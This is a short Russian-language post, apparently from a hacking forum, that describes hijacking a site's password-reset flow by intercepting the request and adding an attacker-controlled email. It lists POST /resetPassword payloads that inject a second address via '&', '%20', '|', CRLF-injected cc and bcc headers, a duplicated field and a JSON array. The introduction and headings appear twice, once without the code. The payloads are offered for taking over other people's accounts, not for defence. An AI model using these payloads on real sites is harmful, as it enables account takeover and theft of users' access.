Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт.
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
Добавление адреса атакующего в параметр через «&»:
Добавление адреса атакующего в параметр через «%20»:
Добавление адреса атакующего в параметр через «|»:
Добавление адреса атакующего в параметр через «cc»:
Добавление адреса атакующего в параметр через «bcc»:
Добавление адреса атакующего в параметр через «,»:
Добавление адреса атакующего в json массив:
Реальный пример такой уязвимости можно посмотреть по этой ссылке
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
Добавление адреса атакующего в параметр через «&»:
Code:
POST /resetPassword
[...]
[email protected]&[email protected]
Добавление адреса атакующего в параметр через «%20»:
Code:
POST /resetPassword
[...]
[email protected]%[email protected]
Добавление адреса атакующего в параметр через «|»:
Code:
POST /resetPassword
[...]
[email protected]|[email protected]
Добавление адреса атакующего в параметр через «cc»:
Code:
POST /resetPassword
[...]
email="[email protected]%0d%0acc:[email protected]"
Добавление адреса атакующего в параметр через «bcc»:
Code:
POST /resetPassword
[...]
email="[email protected]%0d%0abcc:[email protected]"
Добавление адреса атакующего в параметр через «,»:
Code:
POST /resetPassword
[...]
email="[email protected]",email="[email protected]"
Добавление адреса атакующего в json массив:
Code:
POST /resetPassword
[...]
{"email":["[email protected]","[email protected]"]}
Реальный пример такой уязвимости можно посмотреть по этой ссылке